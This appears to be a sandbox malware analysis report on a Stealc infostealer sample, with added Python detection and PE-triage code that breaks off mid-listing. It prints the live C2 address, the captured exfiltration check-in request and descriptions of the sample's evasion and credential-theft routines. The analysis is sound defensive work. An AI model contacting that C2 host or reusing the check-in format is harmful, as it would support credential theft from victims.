Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1541419
MD5: f8499202b78a41093fc86e4ee8be2d0b
SHA1: 56066a06e2ae405ad5e7dc5be7f37283aa742fa0
SHA256: e81eb5bcb9497a84f1f496cf0af37c234f8e80aaf0bb179e153005592ef67321
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 4788 cmdline: "C:\Users\user\Desktop\file.exe" MD5: F8499202B78A41093FC86E4EE8BE2D0B)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings whose development builds on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads seven legitimate third-party DLLs to collect sensitive data from web browsers (sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll). It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware configuration (extracted from 0.2.file.exe.400000.0.unpack):
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches:
Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000003.2089690608.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2133647068.000000000126E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 4788 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 4788 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.400000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

Sigma: No Sigma rule has matched

Suricata alerts:
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-24T20:20:04.670212+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | TCP


                AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.400000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
The Crypt* functions below (base64 decoding via CryptStringToBinaryA, DPAPI via CryptUnprotectData) and the FindFirstFileA/CopyFileA/DeleteFileA loops are consistent with the browser-credential decryption and file-collection routines the Malpedia description attributes to Stealc.
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00407240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00409B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00414570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040F68A FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected (no User-Agent header is sent, which the "HTTP GET or POST without a user agent" signature keys on):
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----BFHDHJKKJDHJJJJKEGHI
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 35 37 42 37 38 43 33 45 34 31 30 34 30 38 31 39 30 37 36 37 32 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 49 2d 2d 0d 0a
    Data Ascii (CRLF line breaks restored):
    ------BFHDHJKKJDHJJJJKEGHI
    Content-Disposition: form-data; name="hwid"

    D57B78C3E4104081907672
    ------BFHDHJKKJDHJJJJKEGHI
    Content-Disposition: form-data; name="build"

    doma
    ------BFHDHJKKJDHJJJJKEGHI--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (7 entries; the C2 is a literal IP in the extracted configuration, so no DNS lookup precedes the connection)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00404880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: file.exe, 00000000.00000002.2133647068.000000000126E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2133647068.00000000012C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2133647068.00000000012C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/?
Source: file.exe, 00000000.00000002.2133647068.00000000012C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2133647068.00000000012C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php1
Source: file.exe, 00000000.00000002.2133647068.00000000012C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpR
Source: file.exe, 00000000.00000002.2133647068.00000000012C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpb
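The C2 check-in captured above is a multipart POST with exactly two fields: hwid (a hex machine identifier) and build (the botnet tag "doma" that also appears in the extracted configuration), sent without a User-Agent header to the literal IP from the configuration. The Python below is an added example, not part of the Joe Sandbox report or of Stealc itself. It embeds the captured body (decoded from the report's hex dump, so it is the page's own data), parses it back into its fields, and applies a heuristic check-in detector built from the traits visible here. The detector's conditions are an assumption of this example and are not the logic of ET SID 2044243.

```python
import re
from typing import Dict, Mapping

# The check-in request exactly as the report captured it (hex decoded). The
# multipart delimiter inside the body is "--" plus the boundary parameter.
CHECKIN_HEADERS: Dict[str, str] = {
    "Content-Type": "multipart/form-data; boundary=----BFHDHJKKJDHJJJJKEGHI",
    "Host": "185.215.113.37",
    "Content-Length": "211",
    "Connection": "Keep-Alive",
    "Cache-Control": "no-cache",
}
CHECKIN_BODY = (
    b"------BFHDHJKKJDHJJJJKEGHI\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n'
    b"\r\n"
    b"D57B78C3E4104081907672\r\n"
    b"------BFHDHJKKJDHJJJJKEGHI\r\n"
    b'Content-Disposition: form-data; name="build"\r\n'
    b"\r\n"
    b"doma\r\n"
    b"------BFHDHJKKJDHJJJJKEGHI--\r\n"
)


def parse_multipart(body: bytes, content_type: str) -> Dict[str, bytes]:
    """Split a multipart/form-data body into {field name: raw value}."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        raise ValueError("Content-Type carries no boundary")
    delimiter = b"--" + m.group(1).encode("ascii")
    fields: Dict[str, bytes] = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):            # closing delimiter "--boundary--"
            break
        # RFC 2046: a part is CRLF, headers, empty line, value, CRLF between delimiters
        part = part[2:] if part.startswith(b"\r\n") else part
        part = part[:-2] if part.endswith(b"\r\n") else part
        head, _, value = part.partition(b"\r\n\r\n")
        name = re.search(rb'name="([^"]*)"', head)
        if name:
            fields[name.group(1).decode("latin-1")] = value
    return fields


def looks_like_stealc_checkin(method: str, path: str,
                              headers: Mapping[str, str], body: bytes) -> bool:
    """Heuristic written for this report (an assumption, not the Suricata rule's
    logic): POST to a .php path, no User-Agent, multipart body whose only fields
    are 'hwid' (hex machine id) and 'build' (botnet tag)."""
    hdrs = {k.lower(): v for k, v in headers.items()}
    if method != "POST" or not path.lower().endswith(".php"):
        return False
    if "user-agent" in hdrs:
        return False
    content_type = hdrs.get("content-type", "")
    if not content_type.startswith("multipart/form-data"):
        return False
    try:
        fields = parse_multipart(body, content_type)
    except ValueError:
        return False
    if set(fields) != {"hwid", "build"}:
        return False
    return re.fullmatch(rb"[0-9A-Fa-f]{8,64}", fields["hwid"]) is not None
```

The parser is deliberately strict about the CRLF framing so that a value is returned byte-exact; a looser `strip()` would silently eat trailing newlines inside exfiltrated file contents, which matter when the same code is later pointed at the file-by-file POSTs the Malpedia description mentions. The hwid pattern and the two-field requirement are the weakest parts of the heuristic and are where a proxy-log rule would want the path fingerprint from the extracted configuration added.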

                System Summary

Source: file.exe | Static PE information: section name: (blank in report)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank in report)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0084C8B3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006F7027
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006EA0AA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B3889
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007CF962
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007CC1ED
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007D49D5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007DA1B9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C8B69
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007DB399
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007D14BA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00734493
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00765D1E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007D7E76
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00735656
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 004045C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: nxusumaz ZLIB complexity 0.9947304242810066
Source: file.exe, 00000000.00000003.2089690608.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\WXVFZ6PQ.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Sections loaded: apphelp.dll, winmm.dll, sspicli.dll, wininet.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll (wininet.dll carries the C2 traffic shown under Networking; rstrtmgr.dll is the Restart Manager, which stealers commonly use to release the locks a running browser holds on its profile databases)
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1865216 > 1048576
Source: file.exe | Static PE information: Raw size of nxusumaz is bigger than: 0x100000 < 0x1a1400

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.400000.0.unpack :EW;.rsrc :W;.idata :W; :EW;nxusumaz:EW;hgxnhwve:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;nxusumaz:EW;hgxnhwve:EW;.taggant:EW; (the first, unnamed section is execute/read on disk but execute/write in the unpacked image; that rights change is what the "Detected unpacking" signature keys on)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1cac0d should be: 0x1cd0cb
Source: file.exe | Static PE information: section name: (blank in report)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank in report)
Source: file.exe | Static PE information: section name: nxusumaz
Source: file.exe | Static PE information: section name: hgxnhwve
Source: file.exe | Static PE information: section name: .taggant
The push/mov pairs below are the evidence for the "call, push, ret" obfuscation signature: "push X; mov dword ptr [esp], Y" pushes a register or junk immediate and then overwrites the slot, so it behaves exactly like "push Y" while feeding a disassembler meaningless constants.
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0084C085 push edx; mov dword ptr [esp], ebp (at 0_2_0084C096)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0084C085 push ebp; mov dword ptr [esp], edx (at 0_2_0084C0AA)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0084C085 push ebx; mov dword ptr [esp], esi (at 0_2_0084C13F)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0088F089 push 0FF36103h; mov dword ptr [esp], ecx (at 0_2_0088F0B8)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00805889 push ebp; mov dword ptr [esp], 3DFE3876h (at 0_2_00805910)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00805889 push 645F3D45h; mov dword ptr [esp], edi (at 0_2_00805936)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00805889 push 47B289C1h; mov dword ptr [esp], edi (at 0_2_0080595C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C2899 push edx; mov dword ptr [esp], eax (at 0_2_008C28BE)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0084C8B3 push edi; mov dword ptr [esp], ebx (at 0_2_0084C8F0)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0084C8B3 push 52F94AAAh; mov dword ptr [esp], esi (at 0_2_0084C946)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0084C8B3 push ecx; mov dword ptr [esp], eax (at 0_2_0084C976)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0084C8B3 push eax; mov dword ptr [esp], ecx (at 0_2_0084C9B5)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0084C8B3 push 49990CA0h; mov dword ptr [esp], esp (at 0_2_0084C9EB)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006F7027 push edx; mov dword ptr [esp], eax (at 0_2_006F7031)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006F7027 push ebp; mov dword ptr [esp], eax (at 0_2_006F7045)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006F7027 push esi; mov dword ptr [esp], ebx (at 0_2_006F70A3)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006F7027 push ebx; mov dword ptr [esp], edi (at 0_2_006F70A8)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006F7027 push edi; mov dword ptr [esp], edx (at 0_2_006F70EA)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006F7027 push esi; mov dword ptr [esp], edx (at 0_2_006F70FE)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006F7027 push 0CF5AE6Ch; mov dword ptr [esp], ecx (at 0_2_006F715A)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006F7027 push ebp; mov dword ptr [esp], 00000000h (at 0_2_006F715E)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006F7027 push 1E3B52E4h; mov dword ptr [esp], eax (at 0_2_006F71B2)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006F7027 push 66E3ABCFh; mov dword ptr [esp], eax (at 0_2_006F7210)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006F7027 push 3B6634EBh; mov dword ptr [esp], esi (at 0_2_006F7264)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0085F8DD push 11BE9061h; mov dword ptr [esp], ecx (at 0_2_0085F90B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008510E5 push 25C5E6ABh; mov dword ptr [esp], ecx (at 0_2_008510A8)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008510E5 push 3BE59884h; mov dword ptr [esp], edx (at 0_2_008510B0)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008050F2 push edx; mov dword ptr [esp], ebp (at 0_2_00805136)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008050F2 push 6FFB5A8Ch; mov dword ptr [esp], eax (at 0_2_00805156)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008050F2 push 168A9179h; mov dword ptr [esp], edi (at 0_2_00805188)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008050F2 push 59A1F4F3h; mov dword ptr [esp], ebp (at 0_2_008051C8)
Source: file.exe | Static PE information: section name: nxusumaz entropy: 7.954159005583094
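Every static finding in this section (entry point in .taggant, the non-standard names nxusumaz, hgxnhwve and .taggant, nxusumaz at entropy 7.95, the stored checksum 0x1cac0d against the computed 0x1cd0cb, and write+execute section rights) can be reproduced without running the sample. The Python below is an added example, not tooling from Joe Sandbox: a minimal PE header walk that performs those same checks on any PE32 or PE32+ file, exercised on a small constructed image that copies this sample's section layout (the real section names, constructed contents), because the analysed file itself is not on this page. The entropy threshold of 7.5 and the list of "standard" section names are assumptions of the example; the checksum routine is the folded one's-complement sum that imagehlp's CheckSumMappedFile produces.

```python
import math
import struct
from collections import Counter
from typing import Dict, List, Tuple

# Names a linker normally emits; anything else is "non-standard" (nxusumaz, hgxnhwve, .taggant here)
STANDARD_SECTIONS = {".text", ".data", ".rdata", ".idata", ".edata", ".rsrc",
                     ".reloc", ".bss", ".tls", ".pdata", ".CRT"}
SCN_EXECUTE, SCN_READ, SCN_WRITE = 0x20000000, 0x40000000, 0x80000000


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant run, 8.0 for uniform bytes (packed data sits near 8)."""
    n = len(data) or 1
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """Optional-header CheckSum as imagehlp computes it: dword sum with end-around
    carry, skipping the CheckSum field itself, folded to 16 bits, plus the file length."""
    padded = data + b"\0" * (-len(data) % 4)
    skip, total = checksum_offset & ~3, 0
    for off in range(0, len(padded), 4):
        if off == skip:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total >> 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def parse_pe(data: bytes):
    """Return (entry RVA, stored CheckSum, file offset of the CheckSum field, section list)."""
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec, opt_size = struct.unpack_from("<H", data, pe + 6)[0], struct.unpack_from("<H", data, pe + 20)[0]
    opt = pe + 24   # optional header; offsets 16 (entry) and 64 (checksum) are the same in PE32 and PE32+
    entry, stored = struct.unpack_from("<I", data, opt + 16)[0], struct.unpack_from("<I", data, opt + 64)[0]
    sections = []
    for k in range(nsec):   # 40-byte IMAGE_SECTION_HEADER entries follow the optional header
        off = opt + opt_size + 40 * k
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, off)
        chars = struct.unpack_from("<I", data, off + 36)[0]
        sections.append((name.rstrip(b"\0").decode("latin-1"), va, vsize, rawptr, rawsize, chars))
    return entry, stored, opt + 64, sections


def triage(data: bytes) -> Dict[str, object]:
    entry, stored, cs_off, sections = parse_pe(data)
    findings: List[str] = []
    real = pe_checksum(data, cs_off)
    if stored != real:
        findings.append(f"invalid checksum: real 0x{stored:x} should be 0x{real:x}")
    entropy: Dict[str, float] = {}
    entry_section = None
    for name, va, vsize, rawptr, rawsize, chars in sections:
        if va <= entry < va + max(vsize, rawsize):
            entry_section = name
        entropy[name] = shannon_entropy(data[rawptr:rawptr + rawsize])
        if name not in STANDARD_SECTIONS:
            findings.append(f"non-standard section name: {name!r}")
        if entropy[name] > 7.5:
            findings.append(f"high entropy section {name!r}: {entropy[name]:.3f}")
        if chars & SCN_EXECUTE and chars & SCN_WRITE:
            findings.append(f"writable+executable section {name!r}")
    if entry_section not in STANDARD_SECTIONS:
        findings.append(f"entry point 0x{entry:x} lies outside standard sections ({entry_section!r})")
    return {"entry_section": entry_section, "entropy": entropy, "findings": findings}


def build_sample_pe(sections: List[Tuple[str, bytes, int]], entry_section: str, checksum: int = 0) -> bytes:
    """Constructed minimal PE32 image (not the report's file) from (name, contents, characteristics)."""
    falign, salign, opt_size = 0x200, 0x1000, 224
    hdr_len = -(-(0x40 + 4 + 20 + opt_size + 40 * len(sections)) // falign) * falign
    rva, rawptr, entry, table, blobs = salign, hdr_len, 0, b"", b""
    for name, blob, chars in sections:
        rawsize = -(-len(blob) // falign) * falign
        entry = rva if name == entry_section else entry
        table += struct.pack("<8sIIIIIIHHI", name.encode(), len(blob), rva, rawsize, rawptr, 0, 0, 0, 0, chars)
        blobs += blob.ljust(rawsize, b"\0")
        rawptr += rawsize
        rva += -(-len(blob) // salign) * salign
    dos = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40)   # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)   # i386, EXECUTABLE_IMAGE|32BIT_MACHINE
    opt = struct.pack("<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6,
                      0x10B, 14, 0, 0, 0, 0, entry, salign, 0, 0x400000, salign, falign,
                      6, 0, 0, 0, 6, 0, 0, rva, hdr_len, checksum, 2, 0,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16) + b"\0" * 128   # 16 empty data directories
    return (dos + b"PE\0\0" + coff + opt + table).ljust(hdr_len, b"\0") + blobs


# Constructed layout echoing the report: plain .text, a packed-looking RWX nxusumaz, entry point in .taggant
SAMPLE_SECTIONS = [
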